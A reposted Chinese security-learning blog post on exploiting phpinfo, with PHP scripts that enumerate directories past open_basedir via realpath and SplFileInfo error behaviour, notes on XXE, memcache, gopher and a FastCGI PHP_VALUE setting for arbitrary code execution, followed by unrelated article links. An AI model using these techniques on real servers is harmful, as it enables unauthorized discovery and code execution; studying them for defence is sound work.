phpinfo信息利用( 二 ) _phpinfo

文章插图

2、realpath列举目录
利用realpath对传入路径的回显不同加上通配符进行列举
本地环境linux就没有进行测试。
<?phpini_set('open_basedir', dirname(__FILE__));printf("open_basedir: %s ", ini_get('open_basedir'));set_error_handler('isexists');$dir = 'd:/test/';$file = '';$chars = 'abcdefghijklmnopqrstuvwxyz0123456789_';for ($i=0; $i < strlen($chars); $i++) {$file = $dir . $chars[$i] . '<><';realpath($file);}function isexists($errno, $errstr){$regexp = '/File((.*)) is not within/';preg_match($regexp, $errstr, $matches);if (isset($matches[1])) {printf("%s ", $matches[1]);}}?>首先设置open_basedir为当前目录，并枚举d:/test/目录下的所有文件。
将错误处理交给isexists函数，在isexists函数中匹配出目录名称，并打印出来。

3、SplFileInfo::getRealPath列举目录
不需要考虑open_basedir开不开起。
<?phpini_set('open_basedir', dirname(__FILE__));printf("open_basedir: %s ", ini_get('open_basedir'));$basedir = 'D:/test/';$arr = array();$chars = 'abcdefghijklmnopqrstuvwxyz0123456789';for ($i=0; $i < strlen($chars); $i++) {$info = new SplFileInfo($basedir . $chars[$i] . '<><');$re = $info->getRealPath();if ($re) {dump($re);}}function dump($s){echo $s . ' ';ob_flush();flush();}?>还有GD库imageftbbox/imagefttext列举目录bindtextdomain暴力猜解目录，基本也都是要暴力破解，效率比较低。
还有这篇文章php5全版本绕过open_basedir读文件脚本给跪了
https://www.leavesongs.com/bypass-open-basedir-readfile.html

三.扩展
imagick
这个的远程执行
libxml
libxml 2.9以前的版本默认支持并开启了外部实体的引用，服务端解析用户提交的 xml 文件时未对 xml 文件引用的外部实体（含外部普通实体和外部参数实体）做合适的处理，会导致XXE 。

memcache
Memcache未授权访问漏洞利用及修复：
http://blog.nsfocus.net/memcache-unauthorized-access-exploit/

redis
这个不多说了……
session
xdebug
GOPHER
利用 Gopher 协议拓展攻击面：
https://blog.chaitin.cn/gopher-attack-surfaces/
看了下尝试复现没有成功，我的理解是首先要支持gopher协议，然后找到一个能执行curl会话的参数，构造gopher格式的payload以post格式去执行反弹shell 。(并没有看懂是怎么利用的)

fastcgi
https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html#php-fpmfastcgi
通过fastcgi传入环境变量，设置
'PHP_VALUE': 'auto_prepend_file =php://input','PHP_ADMIN_VALUE': 'allow_url_include = On'将执行的代码放在body中执行任意代码。

四.总结从刚接触安全的时候就知道phpinfo里有很重要的信息，然而就在前几天我还直接提了个信息泄露(还撞了，丢脸),复现完真的学到很多。

参考链接：
https://www.freebuf.com/articles/web/79830.html
http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0151653.html
https://bbs.ichunqiu.com/thread-3234-1-1.html
作者：HACK-Learn 转载自 https://www.secpulse.com/archives/117762.html
原文地址
作者Phyb0x，zeroyu
http://zeroyu.xyz/2018/11/13/what-phpinfo-can-tell-we/

【phpinfo信息利用】

phpinfo信息利用( 二 )

推荐阅读

小户型|小户型怎么增加储物？小户型设计上要注意什么

暗黑破坏神2重制版怎么看ping-暗黑破坏神2重制版分辨率怎么调-

白醋洗脸有什么好处呢

佛法厚黑|派对与美女互动无视距离，“世界第一”成众矢之的，德约科维奇和妻子都阳性

鱼腌制多长时间可以晒鱼腌制24小时可以晒了吗

驴打滚|我国最受欢迎的几种小吃，很多人听过没吃过，你都吃过哪些呢

1.特朗普的利器，对于互联网公司的封杀

乐观的小刚科技还有90Hz电竞屏+50W快充，友商无奈清仓，骁龙855+手机跌至2299

央视|反击来了！央视“为国撑腰”，一个决定令英方“苦不堪言”！

广州日报|5G基站、智慧路灯…这里有7公里“聪明路”

bi是什么孩子是同性恋怎么办

简单快速的从GitHub同步代码

香菇豆角蒸饺▲花样蒸饺的10做法大全

满江红|《满江红》成了“满江湖”？海报书法被猛批，全是错字别字江湖字

卧室养花的危害卧室养花对身体好不好

红茶为什么要放奶和糖,荔枝红茶泡法

央视网|共同社：菅义伟有意参选自民党总裁

农悦|买回来养了不到一年，如今颜色，状态都不错，一盆乙女心逆袭脱变

激光去除老年斑

孤独的大卫|地量再现反弹还能延续？